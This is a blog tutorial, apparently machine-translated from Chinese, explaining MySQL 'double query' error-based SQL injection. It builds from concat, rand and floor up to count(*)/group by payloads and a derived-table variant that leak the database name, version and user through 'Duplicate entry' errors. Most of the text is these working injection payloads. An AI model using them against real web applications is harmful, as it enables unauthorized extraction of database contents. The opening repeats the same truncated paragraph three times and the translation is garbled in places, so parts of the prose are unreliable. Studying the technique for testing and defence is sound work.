Dual-query Injection

In this article, leaver.mearchives2726.html is difficult to explain. I read some principles. Then try to make it clear to everyone .. Before that, we understand that the keyword of the query is select, which is known to all. Subqueries can be simply understood in a se

In the previous article, http://leaver.me/archives/2726.html I said double query is difficult to explain clearly, this time I try to talk about. I read some principles. Then try to make it clear to everyone .. Before that, we understand that the keyword of the query is select, which is known to all. Subqueries can be simply understood in a se

Http://leaver.me/archives/2726.html in previous article

I said it is difficult to clarify the double query. I will try to explain it this time. I read some principles. Then try to make it clear to everyone ..

Before that, we understand that the keyword of the query is select, which is known to all. Subqueries can be simply understood as a select statement and a select statement. The select statement is a subquery.

Let's look at a simple example:

Select concat((select database()));

In actual execution, the subquery is performed first. Therefore, executing the select database () Statement will find the current database and pass the result to the concat function. This function is used for connection. For example, for concat ('A', 'B'), the result is AB.

Principle:

The dual-injection query requires understanding of four functions/statements.
1. Rand () // Random Function
2. Floor () // obtain the entire function
3. Count () // Aggregate Function
4. Group by clause // grouping statement

In a simple sentence, researchers discovered that when grouping statements are used after an aggregate function, such as the count function, part of the query is displayed incorrectly.

Take a local database named Security as an example.
First, enter

mysql -u root –p toor

It will connect to the database.
Then you can switch to the security database through use security. Because one server may have multiple databases.

Then we will execute the previous simple subquery example.

SELECT concat((select database()));

Security is displayed, that is, the name of the current database.
Then let's test the usage of concat. Input

SELECT concat('string1','string2');

Apparently, the result is string1string2.

Then let's test what the random function rand () is doing.

Select rand();

How many times do we execute

We can see that this function returns the number between 0 and 1.
Then let's take a look at the entire function.

Select floor(1.1123456);

This function returns an integer smaller than or equal to the number you entered.

Then let's look at a simple combination of double injection queries. In my previous article, we should also see that there is a subquery that is

SELECT floor(rand()*2);

We can see from the inside out. Rand () returns a decimal number greater than 0 and less than 1. After multiplied by 2, the number is smaller than 0 and less than 2. Then obtain the result. It can only be 0 or 1. That is, the query result is either 1 or 0.
We are slightly more difficult. View this query

SELECT CONCAT((SELECT database()), FLOOR(RAND()*2));

Don't be afraid. First look at the SELECT database () at the bottom and return the database name. Here is security. Then FLOOR (RAND () * 2) is mentioned above. If it is not 0, it is 1. Connect the two results to concat, then the result is either security0 or security1.

If we add the from table name to the end of this statement. Generally, a set of security0 or security1 is returned. The number is determined by the number of results in the table. For example, a table has five Administrators. This will return five records. Here, there are 13 users in the users table, so 13 records are returned.

If it is from information_schema.schemata, This table contains all the database names of mysql. The local machine has three databases. Therefore, three results are returned.

Now we are going to add the Group By statement.
We use the information_schema.tables or information_schema.columns tables to query. Because the table contains a lot of data. It is easy to generate many random values, not all of which are security0, so that the query results cannot be obtained.

select concat((select database()), floor(rand()*2))as a from information_schema.tables group by a;

Here I will explain it first. We take the result of concat (select database (), floor (rand () * 2) as an alias a, and then use it for grouping. In this way, the same security0 is assigned to one group, and security1 is assigned to one group. There are two results left.

Note. Here, the database () can be replaced with any function you want to query, such as version (), user (), datadir (), or other queries. For example, look up the table. Check the column. The principles are the same.

The last highlight is coming ..
We enter this line: note that an aggregate function count (*) is added (*)

select count(*), concat((select database()), floor(rand()*2))as a from information_schema.tables group by a;

Error reported

ERROR 1062 (23000): Duplicate entry 'security1' for key ‘group_key’

The duplicate key value shows that security is our query result.
You can query the version as follows:

select count(*), concat((select version()), floor(rand()*2))as a from information_schema.tables group by a;

Check if the database () is replaced with version ()

Let's look at another one.

select count(*), concat('~',(select user()),'~', floor(rand()*2))as a from information_schema.tables group by a;

Error

ERROR 1062 (23000): Duplicate entry '~root@localhost~1' for key 'group_key'

Here ~ This symbol is only used to make the results clearer.

There is also a complicated one here. It is called a derived table. Need to use
Select 1 from (table name );

select 1 from (select count(*), concat('~',(select user()),'~', floor(rand()*2))as a from information_schema.tables group by a)x;

.

You can refer to my previous article. I believe it is clear.

Original article address: Describes dual-query injection in detail. Thank you for sharing it with the original author.